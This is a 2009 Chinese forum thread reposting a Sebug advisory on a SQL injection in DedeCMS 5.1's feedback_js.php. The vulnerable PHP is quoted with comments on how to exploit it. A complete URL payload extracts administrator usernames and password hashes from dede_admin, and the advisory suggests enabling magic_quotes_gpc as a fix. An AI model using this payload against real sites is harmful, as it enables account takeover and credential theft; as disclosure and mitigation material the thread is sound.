全球主机交流论坛

标题: 织梦5.1漏洞 28号新爆 [打印本页]

作者: 网络寄生虫 时间: 2009-10-28 20:17
标题: 织梦5.1漏洞 28号新爆
http://sebug.net/vulndb/12527/

影响版本:
DEDECMS 5.1漏洞描述:
同样是在magic_quotes_gpc=off的情况下可用

此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl
......
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
//此处$arcurl没有过滤
if(is_array($row)) $urlindex = $row['id'];
//存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了
}
if(empty($arcID) && empty($urlindex)) exit();
//如果$arcID为空或$urlindex为空则退出
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
//我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了.
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
......
看一下利用方法吧,嘿,为了闭合我用了两次union<*参考
http://www.st0p.org/blog/archive ... ck_js-php-0day.html
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='SEBUG安全建议:
sebug临时解决办法
设置
magic_quotes_gpc=on// sebug.net [2009-10-28]

作者: 啊猪同学 时间: 2009-10-28 20:19
刚升级。。该不是这个吧？

作者: 网络寄生虫 时间: 2009-10-28 20:21
现在我经常关注漏洞库发现满好玩的!!!